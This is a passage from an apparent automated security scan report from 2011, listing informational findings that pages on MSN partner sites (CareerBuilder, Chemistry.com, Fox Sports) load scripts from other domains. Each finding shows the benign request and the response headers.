<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.225. http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/v11.89/Common/js/cbatlascore.js
http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61729
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=395818babba7496ca7f1ec46d56b6afc-349642127-XB-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C8425FF500443C942BAF241B9E407CBF4C42B5FD4C39911286DBFFBA30E2FAA02C46E8E850F0AD333FE8; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:47 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR42
Date: Sat, 29 Jan 2011 23:48:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
MSN Ca
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.226. http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/v11.89/Common/js/cbatlascore.js
http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60120
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=3eb01fb472e34dfbb522cdac313c9679-349642137-w6-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C84271DBE1DDB3CC2075D4566E934132B9FE8F5A3AD8D64E2A0E08564952FD43F1D0830940A7662B16DF; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:56 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Sat, 29 Jan 2011 23:48:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
MSN Ca
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.227. http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/jobseeker/jobs/jobResults.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/v11.89/Common/js/ajaxlogin.js
http://img.icbdr.com/v11.89/Common/js/autocomplete/cbautocomplete.js
http://img.icbdr.com/v11.89/Common/js/cbatlascore.js
http://img.icbdr.com/v11.89/Common/js/cbpopup.js
http://img.icbdr.com/v11.89/Common/js/clientsidetimer.js
http://img.icbdr.com/v11.89/Common/js/contentrequest.js
http://img.icbdr.com/v11.89/Common/js/jobsearching.js
http://img.icbdr.com/v11.89/Common/js/jobseeker/ads/delayedad.js
http://img.icbdr.com/v11.89/Common/js/jobseeker/joblistalternatingstylesfix.js
http://img.icbdr.com/v11.89/Common/js/jobseeker/jobsearching.js
http://img.icbdr.com/v11.89/Common/js/jquery/jquery.cblibrary.min.js
http://img.icbdr.com/v11.89/Common/js/popup.js

Request

GET /jobseeker/jobs/jobResults.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186049
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=fce2ee8d67554dafa8996a80449bf770-349642143-XI-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842AF27C9499CC36681A09DA126FC89CDE67D6CB317A39CA4DEA45CDDE40FA597B269AF1D1F84882078; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:49:02 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB49
Date: Sat, 29 Jan 2011 23:49:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
Job Se
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIxNDQwNTU4NzVkZDmlxXesGnVfzlHjl1k0XgfRTK6B" />

<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jquery/jquery.cblibrary.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jobseeker/ads/delayedad.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/popup.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jobseeker/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/contentrequest.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/autocomplete/cbautocomplete.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jobseeker/joblistalternatingstylesfix.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/ajaxlogin.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbpopup.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/clientsidetimer.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.228. http://msn.careerbuilder.com/msn/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/msn/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js

Request

GET /msn/default.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67783
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=a1015ecbf19144f8ae5b365846c3aa34-349642122-XC-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842F6D25E611765960B75D9DDF2256A2305A68D4A4064297C578D46EDCBE5C2F36EC73EE09F4CCCAF3E; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:42 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sat, 29 Jan 2011 23:48:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
Jobs &
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.229. http://msn.chemistry.com/cp/landing/44762 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/44762

Issue detail

The response dynamically includes the following scripts from other domains:

http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/om/js/lt/lt.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://www.google-analytics.com/urchin.js

Request

GET /cp/landing/44762 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=d278fc94-dbd7-4a08-8cb6-0a6b0f3e8a2e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Session=SID=99B544F5-72EC-4453-B766-5821666E8BC4&Th=11&TID=508259; path=/
Set-Cookie: UMID=c7fdb268-bc89-4e0a-b9a5-5a3cbc611c0e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.230. http://msn.chemistry.com/cp/landing/57269 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.chemistry.com
Path:	/cp/landing/57269

Issue detail

The response dynamically includes the following scripts from other domains:

http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/om/js/lt/lt.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://www.google-analytics.com/urchin.js

Request

GET /cp/landing/57269 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=8529a559-f7f1-4949-aed2-acc51bf1723b; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Session=SID=A963DE98-E013-45FE-A22F-7F3E03113FAE&Th=11&TID=508259; path=/
Set-Cookie: UMID=6abfa29e-5c60-42a5-b7be-7db42c89c8cb; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.231. http://msn.foxsports.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET / HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 302910
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=15
Date: Sat, 29 Jan 2011 23:49:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.232. http://msn.foxsports.com/collegebasketball previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/collegebasketball

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /collegebasketball HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 250446
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Sat, 29 Jan 2011 23:49:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.233. http://msn.foxsports.com/collegebasketball/scores previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/collegebasketball/scores

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js

Request

GET /collegebasketball/scores HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 352641
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.234. http://msn.foxsports.com/collegefootball previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/collegefootball

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /collegefootball HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

